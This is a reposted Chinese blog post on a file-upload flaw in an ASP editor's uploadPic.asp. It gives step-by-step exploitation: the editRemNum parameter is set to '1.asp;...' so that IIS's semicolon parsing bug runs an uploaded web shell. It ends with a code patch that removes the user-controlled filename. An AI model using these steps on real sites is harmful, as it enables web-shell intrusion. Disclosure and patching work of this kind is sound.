簡單說下利用的方法吧。
點擊圖片上傳后會出現上傳頁面，地址為

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=

用普通的圖片上傳后，地址為
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012

很明顯。圖片的地址是根據RemNum后面的編號生成的。

利用很簡單 配合IIS的解析漏洞，把RemNum后面的數據修改為1.asp;41513102009204012

變成下面這個地址

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012

然后在瀏覽器里打開

然后選擇你的腳本***上傳

將會返回下面的地址
uppic/1.asp;41513102009204012_2.gif

然后直接打開就是我們的小馬地址！

[紅科網安]漏洞修補建議:

關鍵代碼：

???????????? if editRemNum<>"" then????????????????
??????????????? remNum = editRemNum
???????????? else
??????????????? Randomize
??????????????? remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
???????????? end if
???????????? remFileName = remNum&"_"&(editImageNum+1)&".gif"
????????? end if

?

去掉自定義部分，只留下隨機參數即可。

保留代碼：

??????????????? Randomize
??????????????? remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
???????????? end if
???????????? remFileName = remNum&"_"&(editImageNum+1)&".gif"

文章如轉載，請注明轉載自【網管小王的獨立博客】：http://www.5iadmin.com/

轉載于:https://blog.51cto.com/shanzhai/924615

總結

以上是生活随笔為你收集整理的MSN Editor 0DAY的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。